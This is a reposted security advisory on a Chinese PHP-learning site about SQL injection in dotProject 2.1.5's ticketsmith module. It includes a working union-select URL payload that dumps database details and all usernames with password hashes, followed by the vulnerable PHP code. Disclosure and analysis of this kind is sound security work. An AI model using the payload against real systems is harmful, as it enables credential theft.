来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: dotProject 2.1.5 SQL Injection Vulnerability作者: sherl0ck_ sherl0ck_[at]alligatorteam[dot]org @AlligatorTeam开发者官网: http://www.dotproject.net/已测试版本 2.1.5测试平台: Debi......
标题: dotProject 2.1.5 SQL Injection Vulnerability 作者: sherl0ck_ <sherl0ck_[at]alligatorteam[dot]org> @AlligatorTeam 开发者官网: http://www.dotproject.net/ 已测试版本 2.1.5 测试平台: Debian GNU/Linux 5.0
示例: URL: http://www.2cto.com /dotproject/index.php?m=ticketsmith&a=view&ticket=-2union all select 1,2,3,@@VERSION,5,USER(),7,8,9,10,11,12,13,DATABASE(),group_concat(user_username,0x3A,user_password,0xA),16 from dotp_users
--------------- 缺陷代码分析 ---------------
modules/ticketsmith/view.php ... 11 $ticket = dPgetParam($_GET, 'ticket', ''); ... 219 $ticket_info = query2hash("SELECT * FROM {$dbprefix}tickets WHERE ticket = $ticket"); ...
Functions:
includes/main_functions.php ... 283 function dPgetParam(&$arr, $name, $def=null) { 284 return defVal($arr[$name], $def); 285 } ...
modules/ticketsmith/common.inc.php ... 50 /* get result in associative array */ 51 function query2hash ($query) { 52 53 $result = do_query($query); 54 $row = @mysql_fetch_array($result); 55 return($row); 56 57 } ... 22 function do_query ($query) { 23 $result = @mysql_query($query); 24 if (!$result) { 25 fatal_error("A database query error has occurred!<br>".mysql_error()); 26 } else { 27 return($result); 28 } 29
30 } |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com